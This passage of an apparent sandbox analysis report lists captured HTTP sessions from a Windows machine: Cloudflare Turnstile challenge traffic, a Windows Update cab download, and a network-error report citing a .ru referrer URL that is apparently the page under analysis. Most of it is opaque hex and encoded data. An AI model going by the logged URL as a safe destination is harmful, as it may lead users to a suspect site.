                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:29 UTC432OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 34 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 68 66 6a 2e 72 6f 6e 74 69 73 68 65 74 2e 72 75 2f 69 43 61 57 7a 6a 36 51 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 34 37 2e 32 31 35 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: [{"age":1,"body":{"elapsed_time":143,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://hfj.rontishet.ru/iCaWzj6Q/","sampling_fraction":1.0,"server_ip":"172.67.147.215","status_code":404,"type":"http.error"},"type":"network-err
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:29 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    date: Mon, 30 Sep 2024 17:20:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    24192.168.2.449768104.18.95.414434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:29 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/194391686:1727712828:JRtCI2iqmwXzQ6uA9YbttRQhBtGvVV2Rs_-r0xzpao4/8cb5e237ab880f47/1bf49d3282149e4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:29 UTC349INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cf-chl-out: QqWE/mdnkcT4MSKr51UClgrYm3CJKfFwoag=$cW/iX2Ba/3OT/MCv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8cb5e24ab82a443e-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:29 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: invalid


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    25192.168.2.449770104.18.95.414434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:31 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/i/8cb5e237ab880f47/1727716828536/ZTYaatjzYFSdFEX HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/yzcnc/0x4AAAAAAAj4CaQsDLLGC_TE/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:31 UTC170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8cb5e2547fbe43d5-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:31 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 55 00 00 00 44 08 02 00 00 00 7f 1d ee 33 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: PNGIHDRUD3IDAT$IENDB`


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    26192.168.2.449772104.18.95.414434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:32 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/pat/8cb5e237ab880f47/1727716828536/c2b18accbaf5c30c53f58bad056d43b5ae357f2f43e8d35f1e70e5782f867ef2/F8ziSgnx8g5pQQx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: max-age=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/yzcnc/0x4AAAAAAAj4CaQsDLLGC_TE/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:32 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:32 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 77 72 47 4b 7a 4c 72 31 77 77 78 54 39 59 75 74 42 57 31 44 74 61 34 31 66 79 39 44 36 4e 4e 66 48 6e 44 6c 65 43 2d 47 66 76 49 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gwrGKzLr1wwxT9YutBW1Dta41fy9D6NNfHnDleC-GfvIAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:32 UTC1INData Raw: 4a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: J


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    27192.168.2.449773104.18.95.414434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:32 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8cb5e237ab880f47/1727716828536/ZTYaatjzYFSdFEX HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:32 UTC170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8cb5e258781f434f-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:32 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 55 00 00 00 44 08 02 00 00 00 7f 1d ee 33 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: PNGIHDRUD3IDAT$IENDB`


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    28192.168.2.44977113.85.23.86443
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:33 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=LrkSUHRE2Sx57my&MD=btZSeAEe HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:33 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MS-CorrelationId: 2b820328-548d-49aa-bc75-67ed22a97cce
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MS-RequestId: e94768e0-fb88-4e94-aaa4-6f3dea5e465e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MS-CV: YMq+6yLK902D14Xu.0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 24490
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:33 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:33 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    29192.168.2.449777104.18.95.414434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:33 UTC926OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/194391686:1727712828:JRtCI2iqmwXzQ6uA9YbttRQhBtGvVV2Rs_-r0xzpao4/8cb5e237ab880f47/1bf49d3282149e4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 31342
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-Challenge: 1bf49d3282149e4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/yzcnc/0x4AAAAAAAj4CaQsDLLGC_TE/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:33 UTC16384OUTData Raw: 76 5f 38 63 62 35 65 32 33 37 61 62 38 38 30 66 34 37 3d 6e 6f 56 53 58 61 5a 45 38 4f 38 41 33 35 79 66 34 66 75 4f 56 5a 4f 70 61 37 5a 43 66 77 53 51 4f 6f 41 61 66 56 53 71 31 4e 48 66 36 66 4e 53 51 48 71 53 66 4d 56 66 4b 6a 53 4f 6f 41 76 66 30 53 61 2d 4d 66 50 48 61 67 66 2d 24 33 45 66 4f 49 56 66 76 61 66 71 63 38 43 66 6c 48 5a 25 32 62 66 56 74 41 54 77 77 66 56 66 71 46 6e 53 65 6b 6e 66 70 7a 32 41 56 54 6b 68 48 61 76 66 41 7a 6c 30 37 79 79 66 31 53 5a 6b 6c 35 65 6c 66 4b 75 53 66 7a 75 36 73 4b 47 62 59 42 66 61 45 6c 34 24 79 74 37 56 58 38 67 73 65 4b 75 58 69 53 49 42 45 38 53 35 37 6f 75 6c 45 43 66 66 45 66 74 63 43 42 42 48 5a 4e 66 41 6e 49 72 30 65 71 6b 67 77 72 2b 66 5a 6e 33 57 51 42 30 43 49 78 6d 49 77 4f 4f 6e 6c 66 48 49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: v_8cb5e237ab880f47=noVSXaZE8O8A35yf4fuOVZOpa7ZCfwSQOoAafVSq1NHf6fNSQHqSfMVfKjSOoAvf0Sa-MfPHagf-$3EfOIVfvafqc8CflHZ%2bfVtATwwfVfqFnSeknfpz2AVTkhHavfAzl07yyf1SZkl5elfKuSfzu6sKGbYBfaEl4$yt7VX8gseKuXiSIBE8S57oulECffEftcCBBHZNfAnIr0eqkgwr+fZn3WQB0CIxmIwOOnlfHI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:33 UTC14958OUTData Raw: 44 57 74 4b 53 52 72 6f 53 65 74 41 38 66 64 48 6d 71 52 2b 75 4d 67 69 41 75 66 2b 66 65 61 66 4d 66 6f 45 6c 48 61 33 4d 62 66 39 48 41 76 66 56 66 70 56 61 55 74 4b 66 51 56 66 4f 66 34 53 61 66 5a 49 66 76 53 51 38 5a 74 66 42 6f 4f 33 66 76 66 30 53 65 66 61 46 66 6a 53 66 77 41 55 66 52 53 61 74 5a 74 5a 74 53 70 48 41 30 66 6e 66 52 38 41 6d 48 4e 68 6d 67 5a 35 34 4f 33 6e 37 66 4d 53 30 45 6e 38 66 68 53 31 56 65 39 78 49 66 6b 48 71 52 61 39 64 59 74 4f 44 4e 78 66 37 66 52 44 4b 6a 53 56 66 75 35 66 33 66 33 66 35 46 41 31 66 30 66 51 41 56 38 66 24 66 6e 56 61 53 5a 63 66 51 38 48 74 5a 53 53 61 56 5a 70 56 45 66 47 56 5a 4f 66 4f 53 65 78 66 38 5a 34 53 4f 67 66 33 5a 73 53 6e 33 66 6f 5a 67 53 5a 74 5a 4b 61 24 71 52 75 66 53 66 4f 65 61 51
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: DWtKSRroSetA8fdHmqR+uMgiAuf+feafMfoElHa3Mbf9HAvfVfpVaUtKfQVfOf4SafZIfvSQ8ZtfBoO3fvf0SefaFfjSfwAUfRSatZtZtSpHA0fnfR8AmHNhmgZ54O3n7fMS0En8fhS1Ve9xIfkHqRa9dYtODNxf7fRDKjSVfu5f3f3f5FA1f0fQAV8f$fnVaSZcfQ8HtZSSaVZpVEfGVZOfOSexf8Z4SOgf3ZsSn3foZgSZtZKa$qRufSfOeaQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:33 UTC300INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 26800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cf-chl-gen: rOuA5LfsfrPMJ9+zRtvs6KUmi9hRrjaFN3gJKy8EeFdVYm96bmCgwNvoBbMdxRqkeVrcnwruc0t/qtqQ$hIroQ22kR7Vwr7JM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8cb5e260fbcb72b6-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:33 UTC1069INData Raw: 6c 4c 6d 7a 77 4a 43 79 66 4b 57 55 74 38 65 6e 6c 71 65 36 78 37 6d 50 75 70 7a 53 7a 73 71 67 31 74 4c 57 73 64 6e 58 73 4c 6d 58 6d 65 47 36 73 4e 57 75 77 62 33 5a 77 65 57 2f 74 74 66 44 35 4e 37 6a 72 73 6a 50 38 37 48 49 36 62 53 7a 30 66 7a 5a 37 76 66 4c 41 4e 4c 4f 38 76 66 65 30 77 6e 65 2b 67 33 47 35 73 55 47 38 65 66 73 35 77 41 46 33 68 49 51 39 68 49 4e 36 2b 38 4c 2b 76 4d 56 38 4e 73 45 39 78 49 62 42 77 73 63 41 78 66 72 2f 67 34 48 37 50 6f 42 4e 43 4d 30 43 41 77 58 45 69 34 73 4f 44 6f 58 4d 67 72 34 49 30 55 65 50 52 77 54 51 52 4d 6a 42 77 73 76 48 31 45 64 54 79 42 41 51 69 68 59 4e 78 55 34 4c 78 68 4d 4d 6c 51 33 55 57 4d 66 4f 6d 4e 46 48 78 73 31 57 69 52 6c 4c 46 63 70 57 7a 49 76 50 53 78 6a 63 47 6f 35 53 58 4e 70 62 6c 52
